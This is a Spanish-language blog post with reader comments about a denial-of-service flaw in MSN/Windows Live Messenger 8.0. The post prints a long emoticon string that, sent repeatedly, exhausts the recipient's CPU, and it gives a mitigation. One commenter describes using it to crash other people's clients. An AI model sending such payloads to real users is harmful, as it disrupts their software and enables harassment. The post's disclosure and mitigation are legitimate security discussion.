DoS (Denegacion de Servicio) en MSN live 8.0

Probablemente el colmo de la seguridad informatica!...
Gracias Microsoft !!!

DoS (Denegacion de Servicio) en MSN live 8.0

Esta es una vulnerabilidad que provoca DoS..

DoS en Windows Live < = 8.0 Se puede hacer un ataque de denegación de servicio en windows live 8.0. Para hacerlo debes ir a Herramientas >
Opciones > Mensajes
Quitar mostrar iconos gestuales

Luego el “exploit” es enviar por msn… Código:

:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D :D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D :D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D :D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D :D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D :D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D :D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D :D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D :D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D :D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D :D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D :D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D :D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D :D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D :D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D :D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D :D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D :D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D :D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D :D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D :D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D :D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D :D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D :D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D :D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D :D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D :D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D :D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D :D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D :D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D :D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D :D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D :D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D :D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D :D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D :D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D :D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D :D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D

Varias veces a tu contacto lo que causara el consumo del 99% de
los recursos causando un DoS Solución:
Para evitar que te hagan esto deberás mantener deshabilitada
la opción de iconos gestuales hasta que salga una versión de msn
con este fallo arreglado.



Gracias a Comunidad Underground de Mexico
Nota original extraida de: http://www.hakim.ws/cum/index.php?topic=16803.0


Nota personal:
Ustedes se preguntaran si esto funciona:




Saludos

Fernando "Jago_ff" Ferrari
Alguna sugerencia?, enviame un mail

6 comentarios:

  1. Hola , confirmo que anda , y anda tambien anda en 8.1 beta y anda en algunas de las ultimas versiones de gaim 2.0-beta4 , que tambien se va a 100 % el procesador , pero no se tilda. (Al menos en unos test , pero no fueron suficientemente largos , talves si se le da mas tiempo se cuelga)

    Saludos y grosa la noticia.

    PD: en Adium no anda ! :)

    ResponderBorrar
  2. Supongo que a partir de esto, abria que poner una restriccion al menos a GAIM, que no te deje poner el mismo icono mas de 5 o 10 veces aproximadamente, con eso ya estaria solucionado el tema. Es un DOS muy muy simple pero ingenioso...

    ResponderBorrar
  3. Juaaa... hace mucho que no me cago de risa con algo como esto. Lo probe y empece a voltear usuarios de ruindows. les decia:
    -Usas Live Msn 8?
    -Si
    -Ok, te recomiendo que uses linux. Mira lo que te pasa por usar esa mierda de ruindows.

    Y les tiraba el “exploit”...
    Muy bueno y divertido... jajaja

    ResponderBorrar
  4. Hola me llamo Jose y tengo 16 años y debo decir que estoy de lleno en todo eso del hacking, y hace unos dias me di cuenta que enviando iconos gestuales hasta acabar con el espacio de caracteres para poder escribir y luego enviarlos haras un DoS casi en el primer ataque, el problema es que despues de hacer esto la victima no puede ingresar al msn y queda deshabilitado.

    ResponderBorrar